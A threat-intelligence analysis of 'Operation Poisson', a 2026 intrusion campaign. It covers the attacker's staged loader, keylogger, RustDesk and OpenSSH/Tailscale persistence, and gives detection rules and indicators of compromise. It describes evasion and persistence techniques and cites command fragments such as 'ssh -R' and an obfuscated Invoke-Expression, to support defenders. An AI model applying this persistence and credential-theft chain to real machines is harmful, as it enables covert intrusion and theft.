Overview
Between March 30 and May 1, 2026, Cato CTRL researcher Vitaly Simonovich tracked a French-speaking cybercriminal known by the handle "Poisson" through every command of a 33-day intrusion operation. The result was 339 recorded commands, four compromised victims, and a persistence mechanism that continued functioning for 18 days after the attacker's primary command-and-control (C2) server went offline.
What makes Operation Poisson stand out from the routine credential-theft campaigns that plague small businesses is not the sophistication of the attacker. Poisson is, by all available indicators, a junior operator -- likely a student learning offensive security while running live operations against real targets. What makes it notable is the specific persistence decision he made on Day 8: installing OpenSSH Server and Tailscale VPN on a victim machine to create a resilient access layer entirely independent of his C2 framework.
That single move validated what defenders have theorized for years but rarely had documented proof of: killing a C2 server is not the same as evicting an attacker. If the attacker has already built a parallel access path through a legitimate VPN mesh, the remediation accomplishes nothing.
This article examines the full operation, the attacker's tooling and techniques, the infrastructure he used, and what it means for detection and response teams.
Threat Actor Profile
Poisson is assessed as a junior, independent, financially motivated threat actor operating with a French-language context. He is not attributed to any known APT group or ransomware crew.
Handle: Poisson (French for "fish")
Secondary Handle: Stikou68
Linux Identity: avenger@ubuntu, home directory at /home/avenger/Desktop/
Language: French (installation notes, victim machines, and playbook were all in French)
Skill Level: Low-to-intermediate; failed approximately half of his attempted actions
Motivation: Financial -- targeting banking credentials, email passwords, and government portal access
Infrastructure Tier: Entirely free-tier (DuckDNS, Backblaze B2, budget IONOS VPS)
The "68" in his secondary handle is a significant detail. In France, "68" refers to the département Haut-Rhin in the Alsace region. Victim 1, a French automotive small business, operated in the same region. This detail was not deliberately disclosed by the attacker -- it was extracted from a test keystroke file he inadvertently left inside his own keylogger package, where he had typed "Stikou68!!!" repeatedly while testing the tool.
Operational Schedule: Cato CTRL observed consistent activity after 15:00 CET with a six-hour midday gap and occasional late-night sessions. This pattern is consistent with a school or academic schedule rather than a professional working day.
OPSEC Failures:
- Leaked his home directory path five times across the campaign
- Named Backblaze B2 buckets after his own handle (
pois43,sentiwaw) - Left his complete SSH playbook, victim SSH keys, and French installation notes on a publicly accessible Backblaze B2 storage bucket
- Left a self-incriminating test keystroke file inside his keylogger package
- Failed at UAC elevation dozens of times before succeeding
- Bandwidth caps on his free-tier Backblaze storage blocked his own payload downloads mid-operation for hours
Despite this, he compromised four machines, harvested credentials from real people, and built access that survived his own C2 going dark.
Targets
Poisson focused exclusively on French victims, likely due to language familiarity and geographic proximity. Cato CTRL identified the following victim profile:
- Victim 1: A French automotive small business (region: Alsace, département 68)
- Victims 2-4: French individuals, one confirmed in Val-d'Oise (département 95, near Paris)
All targets were running Windows. Victim 3, the primary target of extended operations, was confirmed to be running Windows 11 on physical hardware (ASRock B760M motherboard, Intel 12th-generation CPU) -- not a virtual machine, which is relevant because some of his sandbox evasion logic would have behaved differently in a VM.
The narrow targeting and manual credential-retrieval approach suggest this was not an automated mass campaign. Poisson was operating against a small, known-quantity victim set and retrieving the output by hand through the C2 session.
Infrastructure
Poisson built his infrastructure entirely from free-tier services:
| Component | Detail |
|---|---|
| C2 Teamserver | 217[.]154[.]217[.]139 (IONOS SE, Berlin) |
| C2 Redirector | 217[.]154[.]162[.]45 (IONOS SE, Berlin) |
| TLS Certificate CN | wawsenti[.]duckdns[.]org |
| Payload Staging Bucket 1 | pois43[.]s3[.]eu-central-003[.]backblazeb2[.]com |
| Payload Staging Bucket 2 | w456w5[.]s3[.]eu-central-003[.]backblazeb2[.]com |
| Payload Staging Bucket 3 | sentiwaw[.]s3[.]eu-central-003[.]backblazeb2[.]com |
| C2 Framework | Havoc (Demon agent) |
| DNS | DuckDNS (free dynamic DNS) |
The naming convention across his buckets is consistent with his handles. "Pois" is short for Poisson, "senti" appears to be derived from his malware component senti.dll, and "waw" appears to come from his DuckDNS subdomain wawsenti. The bucket sentiwaw combines both elements and was specifically used to host the SSH packages and his playbook -- the bucket that was publicly readable and exposed his entire operation.
Kill Chain: Stage by Stage
Stage 1 -- VBScript Stager (sys.vbs)
The initial stager was a 1.1 KB VBScript file encrypted with AES. Its first action upon execution was a 120-second sleep -- a simple but effective sandbox evasion technique, as many automated analysis environments time out before the payload executes. After the delay, the script decrypted an embedded PowerShell payload and executed it.
To avoid static detection on the invocation string, the script split the expression across a string concatenation: 'Invoke'+'-Expression'. This is a well-known but still functional obfuscation technique that fools basic signature matching.
SHA256: aa7ea19e34567458b4ee66a7cd274181764984bf32123f756a7fdc64d5857b31
Stage 2 -- Fileless Multi-Layer Loader (senti.dll)
The most technically interesting component of the campaign is senti.dll, a 3.1 MB .NET DLL that functions as a five-layer shellcode delivery vehicle with zero files written to disk.
The outer layer encodes shellcode as a sequence of 207,813 English words. Each word maps to a byte value -- for example, "manage" decodes to 0x4D and "therapist" to 0x48. This word-encoding scheme makes the payload look like a large English text corpus at a glance and bypasses tools that scan for shellcode byte patterns.
Inside the word-encoded layer is a Donut-style reflective PE loader using XOR key 0x02, which wraps the actual Havoc Demon agent payload (XOR key 0x01). The Demon agent runs entirely in memory and establishes the C2 connection back to Poisson's IONOS server.
The five-layer structure -- VBScript stager > PowerShell loader > .NET DLL > reflective loader > Demon agent -- means the actual implant never touches disk in any recognizable form.
SHA256: 3b7642b0f84e83a36334c608655c6cb7aae774839a6a3488526b853d89830a60
Stage 3 -- UAC Elevation (Start-Process -Verb RunAs)
Once the Demon agent was running, Poisson attempted to escalate privileges using Start-Process -Verb RunAs. This is not a UAC bypass -- it is the standard Windows privilege elevation dialog. The user sees a consent prompt and must click "Yes." There is no silent exploitation here.
On Victims 1 and 2, someone clicked "Yes" quickly. On Victim 3, it took more than a dozen attempts spread across two days before the user granted consent. This is a meaningful indicator of operational noise: repeated UAC prompts on a machine are a direct detection signal that most endpoint alerting should catch.
Stage 4 -- Persistence Layer
After achieving admin privileges, Poisson deployed three overlapping persistence mechanisms:
- Scheduled Task ("TaskAdmin1"): Runs the VBScript stager at every logon with highest privileges. This is the primary re-infection vector on reboot.
- Startup Shortcut (sys.lnk): Placed in the user's Startup folder as a secondary persistence mechanism.
- Shellcode Injection into Explorer.EXE: The Demon agent shellcode was injected into the
explorer.exeprocess, keeping the implant alive in memory without a standalone malware process visible in the process list.
Stage 5 -- Backup Remote Access (RustDesk)
Poisson deployed a custom-compiled version of RustDesk, a legitimate open-source remote desktop application, with his own relay server configuration baked in. This gave him a graphical remote access channel independent of the Havoc C2 framework.
RustDesk is significant here for two reasons. First, it is a signed, legitimate binary -- most AV and EDR products will not flag it by default. Second, it provides a graphical session in addition to the shell access through Havoc, allowing Poisson to navigate the filesystem visually, take screenshots, and browse through victim files without needing to know specific paths.
SHA256 (RustCustom.zip): c79091ceae7cd592fc08e4854cda7c1182af762b6b126371cc604debdc995fc7
Stage 6 -- Keylogger Deployment (KeyL.zip)
The credential collection mechanism was a 70-line Python script using the pynput library. It logged every keystroke to a local plaintext file on the victim machine. There was no automatic exfiltration -- no beacon, no upload server. Poisson manually retrieved the log file through his Havoc session.
He checked the keylogger output four times on a single day (April 2), confirming approximately 3,000 characters of captured keystrokes in a single active session on Victim 3. The targets were banking credentials, email passwords, and government portal logins -- the kind of credentials that give direct financial access to a small business owner.
To ensure continuous harvesting, Poisson ran powercfg /change standby-timeout-ac 300, setting the machine's sleep timeout to 300 minutes. The machine would stay awake and continue logging keystrokes around the clock.
SHA256 (KeyL.zip): 1f00fd604bb18bbe3081f9ce8d741c4029d2a2125eb8888ac4e0d955938059d6
Stage 7 -- VPN Mesh Persistence (The Critical Move)
On the night of April 7, during a five-hour session, Poisson executed the most consequential action of the entire campaign.
From his sentiwaw Backblaze bucket -- the one that also contained his readable playbook -- he downloaded an SSH package. He then:
- Installed OpenSSH Server on Victim 3's machine
- Configured key-based SSH authentication using his
avenger@ubuntuSSH key pair - Installed Tailscale VPN
- Joined Victim 3's machine to his private Tailscale mesh network
- Established an SSH reverse tunnel using
ssh -R - Tested both access paths
The Tailscale mesh creates an encrypted peer-to-peer network between enrolled nodes. Once a machine is joined to the mesh, it can be reached by other enrolled devices over Tailscale's network regardless of NAT, firewalls, or public IP changes. The SSH server running on Victim 3 was reachable through Tailscale without any exposed public port.
This access path had no dependency on the Havoc C2 server. It required no separate beaconing, no C2 connectivity, and no active session. It simply waited.
Timeline
| Date | Event |
|---|---|
| March 30 | Day 1: Victim 1 compromised in 83 minutes. Scheduled task, RustDesk deployed. |
| March 31 | Persistence established on Victim 3. First UAC elevation attempts fail. |
| April 1 | 51 commands (most active day). UAC eventually succeeds on Victim 3. |
| April 2 | Keylogger deployed. Credentials harvested. powercfg keeps machine awake. |
| April 3-6 | Maintenance, brief Victim 4 connection (4 minutes, likely testing). |
| April 7 | OpenSSH Server + Tailscale installed. VPN mesh persistence established. |
| April 8 | Brief morning session, final power settings. C2 goes offline at 20:44 UTC. |
| April 8-25 | C2 dark for 18 days. Tailscale and SSH access remain active throughout. |
| April 26 | C2 returns online. All victim agents reconnect automatically. |
| April 26-30 | 145 more commands. Keylogger harvested four times in 40 minutes on April 30. |
| April 30 | certutil -scinfo run 10 times. Thales.zip accessed. Two .NET apps run. |
| April 30, 18:14 UTC | Final recorded command. 17 files deleted including Thales artifacts. |
| May 1 | C2 goes offline again. Has not returned. |
The Open Question: Thales.zip
The unresolved element of this campaign is what happened on April 30 when Poisson transferred a file called Thales.zip from a victim's Downloads folder to Victim 3's machine.
He extracted a .NET application called WinFormsApp1.exe and ran it for 21 unattended minutes. He then ran a second file he had pre-staged in his own Backblaze bucket -- Thal.exe, a 148 MB self-contained executable bundled with the full .NET 8.0 runtime -- for another 11 minutes.
The naming is notable. Thales is a major French defense and technology company. Whether the file was something Poisson obtained, something belonging to a victim, or something else entirely is unknown. After both executions completed, Poisson spent four minutes deleting 17 files including all Thales-related artifacts.
The combination of prior certutil -scinfo smart card enumeration and the execution of an unknown application labeled with a defense contractor name -- followed by careful cleanup -- is the part of this campaign that remains unexplained.
SHA256 (Thal.exe): 0378a5ef51b008aa2d6b76bd44a0bf061339bc3b737a188ec82029444d4d18fe
Attribution and Context
Poisson is not attributed to a known APT group. The free-tier infrastructure, inconsistent operational tempo, high failure rate, and French language indicators all point to an individual operator without organizational backing.
The assessment of "junior" should not, however, be read as "harmless." Poisson succeeded. He compromised real machines, stole credentials from real people at a real business, and his access outlived his C2 being taken down. The lower bar for entry into offensive operations -- driven by openly available frameworks like Havoc, legitimate remote access tools like RustDesk and Tailscale, and free hosting infrastructure -- means that what once required significant technical skill can now be executed, imperfectly but effectively, by someone still learning.
Relevant History: Tailscale, RustDesk, and Legitimate Tool Abuse
Operation Poisson is not the first campaign to weaponize Tailscale. The technique of using legitimate VPN mesh software as a persistence and access layer has precedent at the highest levels of the threat landscape.
APT31 (China-nexus) used Tailscale to tunnel network traffic out of compromised Russian IT firms throughout 2024 and into 2025. In those operations, Tailscale served as an encrypted egress channel that blended with legitimate corporate VPN traffic.
Scattered Spider, the social engineering-focused group responsible for high-profile breaches including MGM Resorts and Caesars Entertainment, has used legitimate remote access tools including Ngrok and Fleetdeck as persistence mechanisms and access channels. The pattern of using signed, commercially available software to maintain access is consistent with Poisson's approach.
Akira Ransomware operators have been observed deploying RustDesk as a backup remote access channel in recent intrusion campaigns, mirroring Poisson's use of a custom-compiled RustDesk as a secondary C2 path.
The thread connecting these examples is the same principle Poisson applied: signed, legitimate binaries do not trip file-based detection. Detection that focuses on file reputation and hash matching fails to catch these tools because the tools themselves are not malicious -- only their deployment context is. Behavioral detection, not file scanning, is the required response.
This is also not the first time Havoc has been used as a C2 framework in targeted intrusions. Since its public release, Havoc has appeared in campaigns attributed to multiple threat actors across different geographies and motivations, largely because it is capable, open-source, and generates C2 traffic that can be configured to blend with legitimate HTTPS.
Detection Guidance
Process-Level Detections (Windows EDR)
OpenSSH Server Installation on Workstations
OpenSSH Server installation on a Windows workstation is rarely legitimate. The Windows Optional Feature OpenSSH.Server~~~~0.0.1.0 has a clear install event that should generate an alert on any non-server machine.
Relevant process indicators:
Add-WindowsCapabilitywith parameterOpenSSH.Serversc.execreating or starting servicesshdsshd.exerunning on a workstation-class host
Tailscale Installationtailscale.exe or tailscaled.exe appearing on machines that do not have an approved VPN inventory entry should generate an immediate alert. Watch for:
- Tailscale installer execution
- Service creation for
Tailscale - Network connections from
tailscaled.exeto Tailscale's relay infrastructure (controlplane.tailscale.com,*.tailscale.io) - DNS queries to Tailscale coordination infrastructure from non-approved hosts
SSH Reverse Tunnel Establishment
The command ssh -R (remote port forwarding) from an endpoint to an external host is anomalous in virtually any enterprise environment. Process creation events showing ssh.exe with -R arguments should alert immediately.
Scheduled Task with Highest Privileges Running Script Interpreters
The scheduled task TaskAdmin1 is campaign-specific, but the behavioral pattern is generic: a scheduled task configured with -RunLevel Highest (or the equivalent XML <RunLevel>HighestAvailable</RunLevel>) that executes wscript.exe, powershell.exe, cmd.exe, or similar interpreters should be flagged on any workstation.
powercfg Standby Timeout Modificationpowercfg /change standby-timeout-ac is not a malicious command on its own, but it is a known component of attacker persistence workflows where the attacker needs a machine to remain awake for ongoing credential harvesting or C2 beaconing. Alert on this command being run from unusual parent processes or in conjunction with other suspicious activity.
wscript.exe Executing .vbs from User-Writable Directories
Poisson staged his VBScript stager in user-accessible paths. wscript.exe executing .vbs files from %APPDATA%, %TEMP%, %USERPROFILE%, or \Downloads\ should generate an alert.
Shellcode Injection into Explorer.exe
Process injection into explorer.exe from an unexpected parent process is a high-fidelity detection signal. Sysmon Event ID 8 (CreateRemoteThread) targeting explorer.exe from a non-system process is worth alerting on.
Network-Level Detections
DuckDNS Subdomains
Block or alert on DNS resolution of *.duckdns.org at the corporate DNS resolver or proxy layer. While DuckDNS is a legitimate service, it has consistent appearance in threat actor infrastructure due to the free and anonymous registration model. Most enterprises have no legitimate business reason to resolve DuckDNS subdomains.
Tailscale Coordination Traffic from Unauthorized Hosts
If Tailscale is not an approved enterprise tool, DNS queries to controlplane.tailscale.com or HTTPS connections to *.tailscale.io from endpoint IPs should alert.
Backblaze B2 Object Storage Traffic
Connections to *.backblazeb2.com from endpoints outside of approved application inventory should be reviewed. Backblaze B2 is used by Poisson for all payload staging and is an increasingly common choice for threat actors due to low cost and CDN-grade delivery.
Havoc C2 Beacon Patterns
Havoc Demon agent traffic uses configurable HTTP/HTTPS profiles but has known default patterns. Network detection signatures for Havoc C2 traffic are available in public threat intelligence feeds.
Indicators of Compromise
Network
| Type | Indicator |
|---|---|
| C2 Teamserver | 217[.]154[.]217[.]139 |
| C2 Redirector | 217[.]154[.]162[.]45 |
| DuckDNS Domain | wawsenti[.]duckdns[.]org |
| Payload Staging | pois43[.]s3[.]eu-central-003[.]backblazeb2[.]com |
| Payload Staging | w456w5[.]s3[.]eu-central-003[.]backblazeb2[.]com |
| Payload Staging | sentiwaw[.]s3[.]eu-central-003[.]backblazeb2[.]com |
File Hashes (SHA256)
| File | SHA256 |
|---|---|
| sys.vbs | aa7ea19e34567458b4ee66a7cd274181764984bf32123f756a7fdc64d5857b31 |
| senti.dll | 3b7642b0f84e83a36334c608655c6cb7aae774839a6a3488526b853d89830a60 |
| RustCustom.zip | c79091ceae7cd592fc08e4854cda7c1182af762b6b126371cc604debdc995fc7 |
| SSH.zip | f06e7e1a4363a01ba2a4fee2e28abdd623abf4194bda373f23ff0e151b5c2b45 |
| KeyL.zip | 1f00fd604bb18bbe3081f9ce8d741c4029d2a2125eb8888ac4e0d955938059d6 |
| RevS.ps1 | 291cb1fd0f2709b4457447cbb87adacf5c36c1bcb0f8754524024d44174bb195 |
| Thal.exe | 0378a5ef51b008aa2d6b76bd44a0bf061339bc3b737a188ec82029444d4d18fe |
Host
| Type | Value |
|---|---|
| Scheduled Task | TaskAdmin1 (highest privileges, runs at logon) |
| Service | sshd (configured auto-start) |
| Service | Tailscale |
| Firewall Rules | RustDesk Full Access, RustDesk Full Access OUT, SSH |
| Operator SSH Key | ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIUZH+MrtQKX4Cy68ldwV+1KKpOKU/xrdnucyG5eKZAR avenger@ubuntu |
MITRE ATT&CK Mapping
| Technique ID | Technique Name | Usage |
|---|---|---|
| T1059.001 | Command and Scripting Interpreter: PowerShell | PowerShell loader chain |
| T1059.005 | Command and Scripting Interpreter: VBScript | sys.vbs initial stager |
| T1027 | Obfuscated Files or Information | Word-encoding, XOR layers, AES encryption in stager |
| T1055.001 | Process Injection: Dynamic-link Library Injection | Shellcode injection into explorer.exe |
| T1053.005 | Scheduled Task/Job: Scheduled Task | TaskAdmin1 persistence |
| T1547.001 | Boot or Logon Autostart Execution: Startup Folder | sys.lnk in Startup folder |
| T1219 | Remote Access Software | RustDesk custom build, OpenSSH Server |
| T1572 | Protocol Tunneling | SSH reverse tunnel via Tailscale mesh |
| T1021.004 | Remote Services: SSH | OpenSSH access through Tailscale |
| T1056.001 | Input Capture: Keylogging | 70-line Python keylogger via pynput |
| T1529 | System Shutdown/Reboot (anti-remediation via persistence) | Scheduled tasks, SSH survive reboot |
| T1562.001 | Impair Defenses: Disable or Modify Tools | powercfg standby modification |
Key Takeaways
C2 takedown is not remediation. The defining lesson from Operation Poisson is documented proof that an attacker can build a parallel access layer that survives losing their primary C2. In this case, the access survived an 18-day outage and was still fully functional when the C2 came back online. Remediation teams must now actively hunt for secondary persistence mechanisms beyond the C2 they identified.
Legitimate tools are the evasion strategy. Poisson used no zero-days, no novel exploit techniques, and no custom implants with sophisticated anti-analysis capabilities (beyond the word-encoding loader). His access survived because Tailscale is signed, legitimate software that most organizations have no detection for. The same is true of OpenSSH Server and RustDesk. Detection that depends on file reputation cannot catch these.
The skill floor is lower than it looks. Poisson failed at roughly half of what he attempted. His OPSEC was poor enough that a public storage bucket exposed his entire playbook. And he still compromised four machines and harvested real credentials. As AI tooling and open-source offensive frameworks continue to lower the barrier to entry, the volume of Poisson-class operators will grow even as the individual skill level stays low.
The Thales question remains open. The execution of two unknown .NET applications under a name associated with a major defense contractor, followed by methodical evidence deletion, is the element of this campaign that deserves continued attention if either Thal.exe or WinFormsApp1.exe resurfaces in future investigations.
References
-
Simonovich, V. (2026, June 16). Cato CTRL Threat Research: Operation Poisson -- Analyzing a Cybercriminal's Entire Operation. Cato Networks. https://www.catonetworks.com/blog/cato-ctrl-operation-poisson-analyzing-a-cybercriminals-entire-operation/
-
Khandelwal, S. (2026, June 17). Junior Hacker Used Tailscale and OpenSSH to Keep Access After His C2 Went Offline. The Hacker News. https://thehackernews.com/2026/06/junior-hacker-used-tailscale-and.html
-
MITRE ATT&CK. (2024). Protocol Tunneling (T1572). https://attack.mitre.org/techniques/T1572/
-
MITRE ATT&CK. (2024). Remote Access Software (T1219). https://attack.mitre.org/techniques/T1219/
-
MITRE ATT&CK. (2024). Input Capture: Keylogging (T1056.001). https://attack.mitre.org/techniques/T1056/001/
-
Tailscale. (2026). How Tailscale Works. https://tailscale.com/blog/how-tailscale-works
-
The Hacker News. (2025, November). China-Linked APT31 Launches Stealthy Operations. https://thehackernews.com/2025/11/china-linked-apt31-launches-stealthy.html
-
The Hacker News. (2023, November). US Cybersecurity Agencies Warn of Scattered Spider. https://thehackernews.com/2023/11/us-cybersecurity-agencies-warn-of.html
-
The Hacker News. (2025, September). SonicWall SSL VPN Flaw and Akira Ransomware. https://thehackernews.com/2025/09/sonicwall-ssl-vpn-flaw-and.html
-
The Hacker News. (2023, February). Threat Actors Adopt Havoc Framework for Post-Exploitation. https://thehackernews.com/2023/02/threat-actors-adopt-havoc-framework-for.html
